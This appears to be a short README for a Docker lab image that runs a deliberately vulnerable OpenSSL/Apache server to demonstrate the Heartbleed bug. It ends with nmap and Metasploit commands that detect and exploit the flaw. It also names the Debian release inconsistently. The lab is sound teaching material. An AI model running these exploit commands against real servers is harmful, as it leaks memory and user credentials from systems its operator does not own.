A Debian (Wheezy) Linux system with a vulnerable version of libssl and openssl and a web server to showcase CVS-2014-0160, a.k.a. Heartbleed.
This docker container is based on Debian Jessie and has been modified to use a vulnerable version of libssl and openssl.
A simple static web page is served via Apache 2. In order to provide some juicy data when exploiting the vulnerability we added a simple form that creates a cookie where are stored user credentials. (We know that this is not a real case scenario but it is useful tu understand how informations are stored in the webserver)
Install the container with docker pull effesociety/heartbleed-vulnerable-server
Run the container with a port mapping docker run -d -p 8443:443 effesociety/heartbleed-vulnerable-server
You should be able to access the web application at http://your-ip:8443/.
The web server/vulnerable openssl/libssl version can be verified and exploited as shown below (using a Kali machine is recommended):
root@kali:~/heartbleed-vulnerable-server# nmap -sV -p 8443 --script=ssl-heartbleed your-ip
root@kali:/tmp# msfcli auxiliary/scanner/ssl/openssl_heartbleed RHOSTS=your-ip RPORT=8443 VERBOSE=true E